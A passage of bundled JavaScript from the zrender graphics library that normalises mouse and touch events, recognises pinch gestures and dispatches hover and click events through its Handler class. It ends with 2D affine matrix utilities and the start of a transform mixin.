transformCoordWithViewport(out, el, inX, inY, inverse) {\n    if (el.getBoundingClientRect && env$1.domSupported && !isCanvasEl(el)) {\n        var saved = el[EVENT_SAVED_PROP] || (el[EVENT_SAVED_PROP] = {});\n        var markers = prepareCoordMarkers(el, saved);\n        var transformer = preparePointerTransformer(markers, saved, inverse);\n        if (transformer) {\n            transformer(out, inX, inY);\n            return true;\n        }\n    }\n    return false;\n}\n\nfunction prepareCoordMarkers(el, saved) {\n    var markers = saved.markers;\n    if (markers) {\n        return markers;\n    }\n\n    markers = saved.markers = [];\n    var propLR = ['left', 'right'];\n    var propTB = ['top', 'bottom'];\n\n    for (var i = 0; i < 4; i++) {\n        var marker = document.createElement('div');\n        var stl = marker.style;\n        var idxLR = i % 2;\n        var idxTB = (i >> 1) % 2;\n        stl.cssText = [\n            'position: absolute',\n            'visibility: hidden',\n            'padding: 0',\n            'margin: 0',\n            'border-width: 0',\n            'user-select: none',\n            'width:0',\n            'height:0',\n            // 'width: 5px',\n            // 'height: 5px',\n            propLR[idxLR] + ':0',\n            propTB[idxTB] + ':0',\n            propLR[1 - idxLR] + ':auto',\n            propTB[1 - idxTB] + ':auto',\n            ''\n        ].join('!important;');\n        el.appendChild(marker);\n        markers.push(marker);\n    }\n\n    return markers;\n}\n\nfunction preparePointerTransformer(markers, saved, inverse) {\n    var transformerName = inverse ? 'invTrans' : 'trans';\n    var transformer = saved[transformerName];\n    var oldSrcCoords = saved.srcCoords;\n    var oldCoordTheSame = true;\n    var srcCoords = [];\n    var destCoords = [];\n\n    for (var i = 0; i < 4; i++) {\n        var rect = markers[i].getBoundingClientRect();\n        var ii = 2 * i;\n        var x = rect.left;\n        var y = rect.top;\n        srcCoords.push(x, y);\n        oldCoordTheSame = oldCoordTheSame && oldSrcCoords && x === oldSrcCoords[ii] && y === oldSrcCoords[ii + 1];\n        destCoords.push(markers[i].offsetLeft, markers[i].offsetTop);\n    }\n    // Cache to avoid time consuming of `buildTransformer`.\n    return (oldCoordTheSame && transformer)\n        ? transformer\n        : (\n            saved.srcCoords = srcCoords,\n            saved[transformerName] = inverse\n                ? buildTransformer(destCoords, srcCoords)\n                : buildTransformer(srcCoords, destCoords)\n        );\n}\n\nfunction isCanvasEl(el) {\n    return el.nodeName.toUpperCase() === 'CANVAS';\n}\n\n/**\n * Utilities for mouse or touch events.\n */\n\nvar isDomLevel2 = (typeof window !== 'undefined') && !!window.addEventListener;\n\nvar MOUSE_EVENT_REG = /^(?:mouse|pointer|contextmenu|drag|drop)|click/;\nvar _calcOut = [];\n\n/**\n * Get the `zrX` and `zrY`, which are relative to the top-left of\n * the input `el`.\n * CSS transform (2D & 3D) is supported.\n *\n * The strategy to fetch the coords:\n * + If `calculate` is not set as `true`, users of this method should\n * ensure that `el` is the same or the same size & location as `e.target`.\n * Otherwise the result coords are probably not expected. Because we\n * firstly try to get coords from e.offsetX/e.offsetY.\n * + If `calculate` is set as `true`, the input `el` can be any element\n * and we force to calculate the coords based on `el`.\n * + The input `el` should be positionable (not position:static).\n *\n * The force `calculate` can be used in case like:\n * When mousemove event triggered on ec tooltip, `e.target` is not `el`(zr painter.dom).\n *\n * @param {HTMLElement} el DOM element.\n * @param {Event} e Mouse event or touch event.\n * @param {Object} out Get `out.zrX` and `out.zrY` as the result.\n * @param {boolean} [calculate=false] Whether to force calculate\n *        the coordinates but not use ones provided by browser.\n */\nfunction clientToLocal(el, e, out, calculate) {\n    out = out || {};\n\n    // According to the W3C Working Draft, offsetX and offsetY should be relative\n    // to the padding edge of the target element. The only browser using this convention\n    // is IE. Webkit uses the border edge, Opera uses the content edge, and FireFox does\n    // not support the properties.\n    // (see http://www.jacklmoore.com/notes/mouse-position/)\n    // In zr painter.dom, padding edge equals to border edge.\n\n    if (calculate || !env$1.canvasSupported) {\n        calculateZrXY(el, e, out);\n    }\n    // Caution: In FireFox, layerX/layerY Mouse position relative to the closest positioned\n    // ancestor element, so we should make sure el is positioned (e.g., not position:static).\n    // BTW1, Webkit don't return the same results as FF in non-simple cases (like add\n    // zoom-factor, overflow / opacity layers, transforms ...)\n    // BTW2, (ev.offsetY || ev.pageY - $(ev.target).offset().top) is not correct in preserve-3d.\n    // <https://bugs.jquery.com/ticket/8523#comment:14>\n    // BTW3, In ff, offsetX/offsetY is always 0.\n    else if (env$1.browser.firefox && e.layerX != null && e.layerX !== e.offsetX) {\n        out.zrX = e.layerX;\n        out.zrY = e.layerY;\n    }\n    // For IE6+, chrome, safari, opera. (When will ff support offsetX?)\n    else if (e.offsetX != null) {\n        out.zrX = e.offsetX;\n        out.zrY = e.offsetY;\n    }\n    // For some other device, e.g., IOS safari.\n    else {\n        calculateZrXY(el, e, out);\n    }\n\n    return out;\n}\n\nfunction calculateZrXY(el, e, out) {\n    // BlackBerry 5, iOS 3 (original iPhone) don't have getBoundingRect.\n    if (env$1.domSupported && el.getBoundingClientRect) {\n        var ex = e.clientX;\n        var ey = e.clientY;\n\n        if (isCanvasEl(el)) {\n            // Original approach, which do not support CSS transform.\n            // marker can not be locationed in a canvas container\n            // (getBoundingClientRect is always 0). We do not support\n            // that input a pre-created canvas to zr while using css\n            // transform in iOS.\n            var box = el.getBoundingClientRect();\n            out.zrX = ex - box.left;\n            out.zrY = ey - box.top;\n            return;\n        }\n        else {\n            if (transformCoordWithViewport(_calcOut, el, ex, ey)) {\n                out.zrX = _calcOut[0];\n                out.zrY = _calcOut[1];\n                return;\n            }\n        }\n    }\n    out.zrX = out.zrY = 0;\n}\n\n/**\n * Find native event compat for legency IE.\n * Should be called at the begining of a native event listener.\n *\n * @param {Event} [e] Mouse event or touch event or pointer event.\n *        For lagency IE, we use `window.event` is used.\n * @return {Event} The native event.\n */\nfunction getNativeEvent(e) {\n    return e || window.event;\n}\n\n/**\n * Normalize the coordinates of the input event.\n *\n * Get the `e.zrX` and `e.zrY`, which are relative to the top-left of\n * the input `el`.\n * Get `e.zrDelta` if using mouse wheel.\n * Get `e.which`, see the comment inside this function.\n *\n * Do not calculate repeatly if `zrX` and `zrY` already exist.\n *\n * Notice: see comments in `clientToLocal`. check the relationship\n * between the result coords and the parameters `el` and `calculate`.\n *\n * @param {HTMLElement} el DOM element.\n * @param {Event} [e] See `getNativeEvent`.\n * @param {boolean} [calculate=false] Whether to force calculate\n *        the coordinates but not use ones provided by browser.\n * @return {UIEvent} The normalized native UIEvent.\n */\nfunction normalizeEvent(el, e, calculate) {\n\n    e = getNativeEvent(e);\n\n    if (e.zrX != null) {\n        return e;\n    }\n\n    var eventType = e.type;\n    var isTouch = eventType && eventType.indexOf('touch') >= 0;\n\n    if (!isTouch) {\n        clientToLocal(el, e, e, calculate);\n        e.zrDelta = (e.wheelDelta) ? e.wheelDelta / 120 : -(e.detail || 0) / 3;\n    }\n    else {\n        var touch = eventType !== 'touchend'\n            ? e.targetTouches[0]\n            : e.changedTouches[0];\n        touch && clientToLocal(el, touch, e, calculate);\n    }\n\n    // Add which for click: 1 === left; 2 === middle; 3 === right; otherwise: 0;\n    // See jQuery: https://github.com/jquery/jquery/blob/master/src/event.js\n    // If e.which has been defined, it may be readonly,\n    // see: https://developer.mozilla.org/en-US/docs/Web/API/MouseEvent/which\n    var button = e.button;\n    if (e.which == null && button !== undefined && MOUSE_EVENT_REG.test(e.type)) {\n        e.which = (button & 1 ? 1 : (button & 2 ? 3 : (button & 4 ? 2 : 0)));\n    }\n    // [Caution]: `e.which` from browser is not always reliable. For example,\n    // when press left button and `mousemove (pointermove)` in Edge, the `e.which`\n    // is 65536 and the `e.button` is -1. But the `mouseup (pointerup)` and\n    // `mousedown (pointerdown)` is the same as Chrome does.\n\n    return e;\n}\n\n/**\n * @param {HTMLElement} el\n * @param {string} name\n * @param {Function} handler\n * @param {Object|boolean} opt If boolean, means `opt.capture`\n * @param {boolean} [opt.capture=false]\n * @param {boolean} [opt.passive=false]\n */\nfunction addEventListener(el, name, handler, opt) {\n    if (isDomLevel2) {\n        // Reproduct the console warning:\n        // [Violation] Added non-passive event listener to a scroll-blocking <some> event.\n        // Consider marking event handler as 'passive' to make the page more responsive.\n        // Just set console log level: verbose in chrome dev tool.\n        // then the warning log will be printed when addEventListener called.\n        // See https://github.com/WICG/EventListenerOptions/blob/gh-pages/explainer.md\n        // We have not yet found a neat way to using passive. Because in zrender the dom event\n        // listener delegate all of the upper events of element. Some of those events need\n        // to prevent default. For example, the feature `preventDefaultMouseMove` of echarts.\n        // Before passive can be adopted, these issues should be considered:\n        // (1) Whether and how a zrender user specifies an event listener passive. And by default,\n        // passive or not.\n        // (2) How to tread that some zrender event listener is passive, and some is not. If\n        // we use other way but not preventDefault of mousewheel and touchmove, browser\n        // compatibility should be handled.\n\n        // var opts = (env.passiveSupported && name === 'mousewheel')\n        //     ? {passive: true}\n        //     // By default, the third param of el.addEventListener is `capture: false`.\n        //     : void 0;\n        // el.addEventListener(name, handler /* , opts */);\n        el.addEventListener(name, handler, opt);\n    }\n    else {\n        // For simplicity, do not implement `setCapture` for IE9-.\n        el.attachEvent('on' + name, handler);\n    }\n}\n\n/**\n * Parameter are the same as `addEventListener`.\n *\n * Notice that if a listener is registered twice, one with capture and one without,\n * remove each one separately. Removal of a capturing listener does not affect a\n * non-capturing version of the same listener, and vice versa.\n */\nfunction removeEventListener(el, name, handler, opt) {\n    if (isDomLevel2) {\n        el.removeEventListener(name, handler, opt);\n    }\n    else {\n        el.detachEvent('on' + name, handler);\n    }\n}\n\n/**\n * preventDefault and stopPropagation.\n * Notice: do not use this method in zrender. It can only be\n * used by upper applications if necessary.\n *\n * @param {Event} e A mouse or touch event.\n */\nvar stop = isDomLevel2\n    ? function (e) {\n        e.preventDefault();\n        e.stopPropagation();\n        e.cancelBubble = true;\n    }\n    : function (e) {\n        e.returnValue = false;\n        e.cancelBubble = true;\n    };\n\n/**\n * This method only works for mouseup and mousedown. The functionality is restricted\n * for fault tolerance, See the `e.which` compatibility above.\n *\n * @param {MouseEvent} e\n * @return {boolean}\n */\nfunction isMiddleOrRightButtonOnMouseUpDown(e) {\n    return e.which === 2 || e.which === 3;\n}\n\n/**\n * To be removed.\n * @deprecated\n */\n\n/**\n * Only implements needed gestures for mobile.\n */\n\nvar GestureMgr = function () {\n\n    /**\n     * @private\n     * @type {Array.<Object>}\n     */\n    this._track = [];\n};\n\nGestureMgr.prototype = {\n\n    constructor: GestureMgr,\n\n    recognize: function (event, target, root) {\n        this._doTrack(event, target, root);\n        return this._recognize(event);\n    },\n\n    clear: function () {\n        this._track.length = 0;\n        return this;\n    },\n\n    _doTrack: function (event, target, root) {\n        var touches = event.touches;\n\n        if (!touches) {\n            return;\n        }\n\n        var trackItem = {\n            points: [],\n            touches: [],\n            target: target,\n            event: event\n        };\n\n        for (var i = 0, len = touches.length; i < len; i++) {\n            var touch = touches[i];\n            var pos = clientToLocal(root, touch, {});\n            trackItem.points.push([pos.zrX, pos.zrY]);\n            trackItem.touches.push(touch);\n        }\n\n        this._track.push(trackItem);\n    },\n\n    _recognize: function (event) {\n        for (var eventName in recognizers) {\n            if (recognizers.hasOwnProperty(eventName)) {\n                var gestureInfo = recognizers[eventName](this._track, event);\n                if (gestureInfo) {\n                    return gestureInfo;\n                }\n            }\n        }\n    }\n};\n\nfunction dist$1(pointPair) {\n    var dx = pointPair[1][0] - pointPair[0][0];\n    var dy = pointPair[1][1] - pointPair[0][1];\n\n    return Math.sqrt(dx * dx + dy * dy);\n}\n\nfunction center(pointPair) {\n    return [\n        (pointPair[0][0] + pointPair[1][0]) / 2,\n        (pointPair[0][1] + pointPair[1][1]) / 2\n    ];\n}\n\nvar recognizers = {\n\n    pinch: function (track, event) {\n        var trackLen = track.length;\n\n        if (!trackLen) {\n            return;\n        }\n\n        var pinchEnd = (track[trackLen - 1] || {}).points;\n        var pinchPre = (track[trackLen - 2] || {}).points || pinchEnd;\n\n        if (pinchPre\n            && pinchPre.length > 1\n            && pinchEnd\n            && pinchEnd.length > 1\n        ) {\n            var pinchScale = dist$1(pinchEnd) / dist$1(pinchPre);\n            !isFinite(pinchScale) && (pinchScale = 1);\n\n            event.pinchScale = pinchScale;\n\n            var pinchCenter = center(pinchEnd);\n            event.pinchX = pinchCenter[0];\n            event.pinchY = pinchCenter[1];\n\n            return {\n                type: 'pinch',\n                target: track[0].target,\n                event: event\n            };\n        }\n    }\n\n    // Only pinch currently.\n};\n\n/**\n * [The interface between `Handler` and `HandlerProxy`]:\n *\n * The default `HandlerProxy` only support the common standard web environment\n * (e.g., standalone browser, headless browser, embed browser in mobild APP, ...).\n * But `HandlerProxy` can be replaced to support more non-standard environment\n * (e.g., mini app), or to support more feature that the default `HandlerProxy`\n * not provided (like echarts-gl did).\n * So the interface between `Handler` and `HandlerProxy` should be stable. Do not\n * make break changes util inevitable. The interface include the public methods\n * of `Handler` and the events listed in `handlerNames` below, by which `HandlerProxy`\n * drives `Handler`.\n */\n\n/**\n * [Drag outside]:\n *\n * That is, triggering `mousemove` and `mouseup` event when the pointer is out of the\n * zrender area when dragging. That is important for the improvement of the user experience\n * when dragging something near the boundary without being terminated unexpectedly.\n *\n * We originally consider to introduce new events like `pagemovemove` and `pagemouseup`\n * to resolve this issue. But some drawbacks of it is described in\n * https://github.com/ecomfe/zrender/pull/536#issuecomment-560286899\n *\n * Instead, we referenced the specifications:\n * https://www.w3.org/TR/touch-events/#the-touchmove-event\n * https://www.w3.org/TR/2014/WD-DOM-Level-3-Events-20140925/#event-type-mousemove\n * where the the mousemove/touchmove can be continue to fire if the user began a drag\n * operation and the pointer has left the boundary. (for the mouse event, browsers\n * only do it on `document` and when the pointer has left the boundary of the browser.)\n *\n * So the default `HandlerProxy` supports this feature similarly: if it is in the dragging\n * state (see `pointerCapture` in `HandlerProxy`), the `mousemove` and `mouseup` continue\n * to fire until release the pointer. That is implemented by listen to those event on\n * `document`.\n * If we implement some other `HandlerProxy` only for touch device, that would be easier.\n * The touch event support this feature by default.\n *\n * Note:\n * There might be some cases that the mouse event can not be\n * received on `document`. For example,\n * (A) `useCapture` is not supported and some user defined event listeners on the ancestor\n * of zr dom throw Error .\n * (B) `useCapture` is not supported Some user defined event listeners on the ancestor of\n * zr dom call `stopPropagation`.\n * In these cases, the `mousemove` event might be keep triggered event\n * if the mouse is released. We try to reduce the side-effect in those cases.\n * That is, do nothing (especially, `findHover`) in those cases. See `isOutsideBoundary`.\n *\n * Note:\n * If `HandlerProxy` listens to `document` with `useCapture`, `HandlerProxy` needs to\n * make sure `stopPropagation` and `preventDefault` doing nothing if and only if the event\n * target is not zrender dom. Becuase it is dangerous to enable users to call them in\n * `document` capture phase to prevent the propagation to any listener of the webpage.\n * But they are needed to work when the pointer inside the zrender dom.\n */\n\n\nvar SILENT = 'silent';\n\nfunction makeEventPacket(eveType, targetInfo, event) {\n    return {\n        type: eveType,\n        event: event,\n        // target can only be an element that is not silent.\n        target: targetInfo.target,\n        // topTarget can be a silent element.\n        topTarget: targetInfo.topTarget,\n        cancelBubble: false,\n        offsetX: event.zrX,\n        offsetY: event.zrY,\n        gestureEvent: event.gestureEvent,\n        pinchX: event.pinchX,\n        pinchY: event.pinchY,\n        pinchScale: event.pinchScale,\n        wheelDelta: event.zrDelta,\n        zrByTouch: event.zrByTouch,\n        which: event.which,\n        stop: stopEvent\n    };\n}\n\nfunction stopEvent() {\n    stop(this.event);\n}\n\nfunction EmptyProxy() {}\nEmptyProxy.prototype.dispose = function () {};\n\n\nvar handlerNames = [\n    'click', 'dblclick', 'mousewheel', 'mouseout',\n    'mouseup', 'mousedown', 'mousemove', 'contextmenu'\n];\n\n/**\n * @alias module:zrender/Handler\n * @constructor\n * @extends module:zrender/mixin/Eventful\n * @param {module:zrender/Storage} storage Storage instance.\n * @param {module:zrender/Painter} painter Painter instance.\n * @param {module:zrender/dom/HandlerProxy} proxy HandlerProxy instance.\n * @param {HTMLElement} painterRoot painter.root (not painter.getViewportRoot()).\n */\nvar Handler = function (storage, painter, proxy, painterRoot) {\n    Eventful.call(this);\n\n    this.storage = storage;\n\n    this.painter = painter;\n\n    this.painterRoot = painterRoot;\n\n    proxy = proxy || new EmptyProxy();\n\n    /**\n     * Proxy of event. can be Dom, WebGLSurface, etc.\n     */\n    this.proxy = null;\n\n    /**\n     * {target, topTarget, x, y}\n     * @private\n     * @type {Object}\n     */\n    this._hovered = {};\n\n    /**\n     * @private\n     * @type {Date}\n     */\n    this._lastTouchMoment;\n\n    /**\n     * @private\n     * @type {number}\n     */\n    this._lastX;\n\n    /**\n     * @private\n     * @type {number}\n     */\n    this._lastY;\n\n    /**\n     * @private\n     * @type {module:zrender/core/GestureMgr}\n     */\n    this._gestureMgr;\n\n    Draggable.call(this);\n\n    this.setHandlerProxy(proxy);\n};\n\nHandler.prototype = {\n\n    constructor: Handler,\n\n    setHandlerProxy: function (proxy) {\n        if (this.proxy) {\n            this.proxy.dispose();\n        }\n\n        if (proxy) {\n            each$1(handlerNames, function (name) {\n                proxy.on && proxy.on(name, this[name], this);\n            }, this);\n            // Attach handler\n            proxy.handler = this;\n        }\n        this.proxy = proxy;\n    },\n\n    mousemove: function (event) {\n        var x = event.zrX;\n        var y = event.zrY;\n\n        var isOutside = isOutsideBoundary(this, x, y);\n\n        var lastHovered = this._hovered;\n        var lastHoveredTarget = lastHovered.target;\n\n        // If lastHoveredTarget is removed from zr (detected by '__zr') by some API call\n        // (like 'setOption' or 'dispatchAction') in event handlers, we should find\n        // lastHovered again here. Otherwise 'mouseout' can not be triggered normally.\n        // See #6198.\n        if (lastHoveredTarget && !lastHoveredTarget.__zr) {\n            lastHovered = this.findHover(lastHovered.x, lastHovered.y);\n            lastHoveredTarget = lastHovered.target;\n        }\n\n        var hovered = this._hovered = isOutside ? {x: x, y: y} : this.findHover(x, y);\n        var hoveredTarget = hovered.target;\n\n        var proxy = this.proxy;\n        proxy.setCursor && proxy.setCursor(hoveredTarget ? hoveredTarget.cursor : 'default');\n\n        // Mouse out on previous hovered element\n        if (lastHoveredTarget && hoveredTarget !== lastHoveredTarget) {\n            this.dispatchToElement(lastHovered, 'mouseout', event);\n        }\n\n        // Mouse moving on one element\n        this.dispatchToElement(hovered, 'mousemove', event);\n\n        // Mouse over on a new element\n        if (hoveredTarget && hoveredTarget !== lastHoveredTarget) {\n            this.dispatchToElement(hovered, 'mouseover', event);\n        }\n    },\n\n    mouseout: function (event) {\n        var eventControl = event.zrEventControl;\n        var zrIsToLocalDOM = event.zrIsToLocalDOM;\n\n        if (eventControl !== 'only_globalout') {\n            this.dispatchToElement(this._hovered, 'mouseout', event);\n        }\n\n        if (eventControl !== 'no_globalout') {\n            // FIXME: if the pointer moving from the extra doms to realy \"outside\",\n            // the `globalout` should have been triggered. But currently not.\n            !zrIsToLocalDOM && this.trigger('globalout', {type: 'globalout', event: event});\n        }\n    },\n\n    /**\n     * Resize\n     */\n    resize: function (event) {\n        this._hovered = {};\n    },\n\n    /**\n     * Dispatch event\n     * @param {string} eventName\n     * @param {event=} eventArgs\n     */\n    dispatch: function (eventName, eventArgs) {\n        var handler = this[eventName];\n        handler && handler.call(this, eventArgs);\n    },\n\n    /**\n     * Dispose\n     */\n    dispose: function () {\n\n        this.proxy.dispose();\n\n        this.storage =\n        this.proxy =\n        this.painter = null;\n    },\n\n    /**\n     * 设置默认的cursor style\n     * @param {string} [cursorStyle='default'] 例如 crosshair\n     */\n    setCursorStyle: function (cursorStyle) {\n        var proxy = this.proxy;\n        proxy.setCursor && proxy.setCursor(cursorStyle);\n    },\n\n    /**\n     * 事件分发代理\n     *\n     * @private\n     * @param {Object} targetInfo {target, topTarget} 目标图形元素\n     * @param {string} eventName 事件名称\n     * @param {Object} event 事件对象\n     */\n    dispatchToElement: function (targetInfo, eventName, event) {\n        targetInfo = targetInfo || {};\n        var el = targetInfo.target;\n        if (el && el.silent) {\n            return;\n        }\n        var eventHandler = 'on' + eventName;\n        var eventPacket = makeEventPacket(eventName, targetInfo, event);\n\n        while (el) {\n            el[eventHandler]\n                && (eventPacket.cancelBubble = el[eventHandler].call(el, eventPacket));\n\n            el.trigger(eventName, eventPacket);\n\n            el = el.parent;\n\n            if (eventPacket.cancelBubble) {\n                break;\n            }\n        }\n\n        if (!eventPacket.cancelBubble) {\n            // 冒泡到顶级 zrender 对象\n            this.trigger(eventName, eventPacket);\n            // 分发事件到用户自定义层\n            // 用户有可能在全局 click 事件中 dispose，所以需要判断下 painter 是否存在\n            this.painter && this.painter.eachOtherLayer(function (layer) {\n                if (typeof (layer[eventHandler]) === 'function') {\n                    layer[eventHandler].call(layer, eventPacket);\n                }\n                if (layer.trigger) {\n                    layer.trigger(eventName, eventPacket);\n                }\n            });\n        }\n    },\n\n    /**\n     * @private\n     * @param {number} x\n     * @param {number} y\n     * @param {module:zrender/graphic/Displayable} exclude\n     * @return {model:zrender/Element}\n     * @method\n     */\n    findHover: function (x, y, exclude) {\n        var list = this.storage.getDisplayList();\n        var out = {x: x, y: y};\n\n        for (var i = list.length - 1; i >= 0; i--) {\n            var hoverCheckResult;\n            if (list[i] !== exclude\n                // getDisplayList may include ignored item in VML mode\n                && !list[i].ignore\n                && (hoverCheckResult = isHover(list[i], x, y))\n            ) {\n                !out.topTarget && (out.topTarget = list[i]);\n                if (hoverCheckResult !== SILENT) {\n                    out.target = list[i];\n                    break;\n                }\n            }\n        }\n\n        return out;\n    },\n\n    processGesture: function (event, stage) {\n        if (!this._gestureMgr) {\n            this._gestureMgr = new GestureMgr();\n        }\n        var gestureMgr = this._gestureMgr;\n\n        stage === 'start' && gestureMgr.clear();\n\n        var gestureInfo = gestureMgr.recognize(\n            event,\n            this.findHover(event.zrX, event.zrY, null).target,\n            this.proxy.dom\n        );\n\n        stage === 'end' && gestureMgr.clear();\n\n        // Do not do any preventDefault here. Upper application do that if necessary.\n        if (gestureInfo) {\n            var type = gestureInfo.type;\n            event.gestureEvent = type;\n\n            this.dispatchToElement({target: gestureInfo.target}, type, gestureInfo.event);\n        }\n    }\n};\n\n// Common handlers\neach$1(['click', 'mousedown', 'mouseup', 'mousewheel', 'dblclick', 'contextmenu'], function (name) {\n    Handler.prototype[name] = function (event) {\n        var x = event.zrX;\n        var y = event.zrY;\n        var isOutside = isOutsideBoundary(this, x, y);\n\n        var hovered;\n        var hoveredTarget;\n\n        if (name !== 'mouseup' || !isOutside) {\n            // Find hover again to avoid click event is dispatched manually. Or click is triggered without mouseover\n            hovered = this.findHover(x, y);\n            hoveredTarget = hovered.target;\n        }\n\n        if (name === 'mousedown') {\n            this._downEl = hoveredTarget;\n            this._downPoint = [event.zrX, event.zrY];\n            // In case click triggered before mouseup\n            this._upEl = hoveredTarget;\n        }\n        else if (name === 'mouseup') {\n            this._upEl = hoveredTarget;\n        }\n        else if (name === 'click') {\n            if (this._downEl !== this._upEl\n                // Original click event is triggered on the whole canvas element,\n                // including the case that `mousedown` - `mousemove` - `mouseup`,\n                // which should be filtered, otherwise it will bring trouble to\n                // pan and zoom.\n                || !this._downPoint\n                // Arbitrary value\n                || dist(this._downPoint, [event.zrX, event.zrY]) > 4\n            ) {\n                return;\n            }\n            this._downPoint = null;\n        }\n\n        this.dispatchToElement(hovered, name, event);\n    };\n});\n\nfunction isHover(displayable, x, y) {\n    if (displayable[displayable.rectHover ? 'rectContain' : 'contain'](x, y)) {\n        var el = displayable;\n        var isSilent;\n        while (el) {\n            // If clipped by ancestor.\n            // FIXME: If clipPath has neither stroke nor fill,\n            // el.clipPath.contain(x, y) will always return false.\n            if (el.clipPath && !el.clipPath.contain(x, y)) {\n                return false;\n            }\n            if (el.silent) {\n                isSilent = true;\n            }\n            el = el.parent;\n        }\n        return isSilent ? SILENT : true;\n    }\n\n    return false;\n}\n\n/**\n * See [Drag outside].\n */\nfunction isOutsideBoundary(handlerInstance, x, y) {\n    var painter = handlerInstance.painter;\n    return x < 0 || x > painter.getWidth() || y < 0 || y > painter.getHeight();\n}\n\nmixin(Handler, Eventful);\nmixin(Handler, Draggable);\n\n/**\n * 3x2矩阵操作类\n * @exports zrender/tool/matrix\n */\n\n/* global Float32Array */\n\nvar ArrayCtor$1 = typeof Float32Array === 'undefined'\n    ? Array\n    : Float32Array;\n\n/**\n * Create a identity matrix.\n * @return {Float32Array|Array.<number>}\n */\nfunction create$1() {\n    var out = new ArrayCtor$1(6);\n    identity(out);\n\n    return out;\n}\n\n/**\n * 设置矩阵为单位矩阵\n * @param {Float32Array|Array.<number>} out\n */\nfunction identity(out) {\n    out[0] = 1;\n    out[1] = 0;\n    out[2] = 0;\n    out[3] = 1;\n    out[4] = 0;\n    out[5] = 0;\n    return out;\n}\n\n/**\n * 复制矩阵\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} m\n */\nfunction copy$1(out, m) {\n    out[0] = m[0];\n    out[1] = m[1];\n    out[2] = m[2];\n    out[3] = m[3];\n    out[4] = m[4];\n    out[5] = m[5];\n    return out;\n}\n\n/**\n * 矩阵相乘\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} m1\n * @param {Float32Array|Array.<number>} m2\n */\nfunction mul$1(out, m1, m2) {\n    // Consider matrix.mul(m, m2, m);\n    // where out is the same as m2.\n    // So use temp variable to escape error.\n    var out0 = m1[0] * m2[0] + m1[2] * m2[1];\n    var out1 = m1[1] * m2[0] + m1[3] * m2[1];\n    var out2 = m1[0] * m2[2] + m1[2] * m2[3];\n    var out3 = m1[1] * m2[2] + m1[3] * m2[3];\n    var out4 = m1[0] * m2[4] + m1[2] * m2[5] + m1[4];\n    var out5 = m1[1] * m2[4] + m1[3] * m2[5] + m1[5];\n    out[0] = out0;\n    out[1] = out1;\n    out[2] = out2;\n    out[3] = out3;\n    out[4] = out4;\n    out[5] = out5;\n    return out;\n}\n\n/**\n * 平移变换\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} a\n * @param {Float32Array|Array.<number>} v\n */\nfunction translate(out, a, v) {\n    out[0] = a[0];\n    out[1] = a[1];\n    out[2] = a[2];\n    out[3] = a[3];\n    out[4] = a[4] + v[0];\n    out[5] = a[5] + v[1];\n    return out;\n}\n\n/**\n * 旋转变换\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} a\n * @param {number} rad\n */\nfunction rotate(out, a, rad) {\n    var aa = a[0];\n    var ac = a[2];\n    var atx = a[4];\n    var ab = a[1];\n    var ad = a[3];\n    var aty = a[5];\n    var st = Math.sin(rad);\n    var ct = Math.cos(rad);\n\n    out[0] = aa * ct + ab * st;\n    out[1] = -aa * st + ab * ct;\n    out[2] = ac * ct + ad * st;\n    out[3] = -ac * st + ct * ad;\n    out[4] = ct * atx + st * aty;\n    out[5] = ct * aty - st * atx;\n    return out;\n}\n\n/**\n * 缩放变换\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} a\n * @param {Float32Array|Array.<number>} v\n */\nfunction scale$1(out, a, v) {\n    var vx = v[0];\n    var vy = v[1];\n    out[0] = a[0] * vx;\n    out[1] = a[1] * vy;\n    out[2] = a[2] * vx;\n    out[3] = a[3] * vy;\n    out[4] = a[4] * vx;\n    out[5] = a[5] * vy;\n    return out;\n}\n\n/**\n * 求逆矩阵\n * @param {Float32Array|Array.<number>} out\n * @param {Float32Array|Array.<number>} a\n */\nfunction invert(out, a) {\n\n    var aa = a[0];\n    var ac = a[2];\n    var atx = a[4];\n    var ab = a[1];\n    var ad = a[3];\n    var aty = a[5];\n\n    var det = aa * ad - ab * ac;\n    if (!det) {\n        return null;\n    }\n    det = 1.0 / det;\n\n    out[0] = ad * det;\n    out[1] = -ab * det;\n    out[2] = -ac * det;\n    out[3] = aa * det;\n    out[4] = (ac * aty - ad * atx) * det;\n    out[5] = (ab * atx - aa * aty) * det;\n    return out;\n}\n\n/**\n * Clone a new matrix.\n * @param {Float32Array|Array.<number>} a\n */\nfunction clone$2(a) {\n    var b = create$1();\n    copy$1(b, a);\n    return b;\n}\n\nvar matrix = (Object.freeze || Object)({\n\tcreate: create$1,\n\tidentity: identity,\n\tcopy: copy$1,\n\tmul: mul$1,\n\ttranslate: translate,\n\trotate: rotate,\n\tscale: scale$1,\n\tinvert: invert,\n\tclone: clone$2\n});\n\n/**\n * 提供变换扩展\n * @module zrender/mixin/Transformable\n * @author pissang (https://www.github.com/pissang)\n */\n\nvar mIdentity = identity;\n\nvar EPSILON = 5e-5;\n\nfunction isNotAroundZero(val) {\n    return val > EPSILON || val < -EPSILON;\n}\n\n/**\n * @alias module:zrender/mixin/Transformable\n * @constructor\n */\nvar Transformable = function (opts) {\n    opts = opts || {};\n    // If there are no given position, rotation, scale\n    if (!opts.position) {\n        /**\n         * 平移\n         * @type {Array.<number>}\n         * @default [0, 0]\n         */\n        this.position = [0, 0];\n    }\n    if (opts.rotation == null) {\n        /**\n         * 旋转\n         * @type {Array.<number>}\n         * @default 0\n         */\n        this.rotation = 0;\n    }\n    if (!opts.scale) {\n        /**\n         * 缩放\n         * @type {Array.<number>}\n         * @default [1, 1]\n         */\n        this.scale = [1, 1];\n    }\n    /**\n     * 旋转和缩放的原点\n     * @type {Array.<number>}\n     * @default null\n     */\n    this.origin = this.origin || null;\n};\n\nvar transformableProto = Transformable.prototype;\ntransformableProto.transform = null;\n\n/**\n * 判断是否需要有坐标变换\n * 如果有坐标变换, 则从position, rotation, scale以及父节点的transform计算出自身的transform矩阵\n */\ntransformableProto.needLocalTransform = function () {\n    return isNotAroundZero(this.rotation)\n        || isNotAroundZero(this.position[0])\n        || isNotAroundZero(this.position[1])\n        || isNotAroundZero(this.scale[0] - 1)\n        || isNotAroundZero(this.scale[1] - 1);\n};\n\nvar scaleTmp = [];\ntransformableProto.updateTransform = function () {\n    var parent = this.parent;\n    var parentHasTransform = parent && parent.transform;\n    var 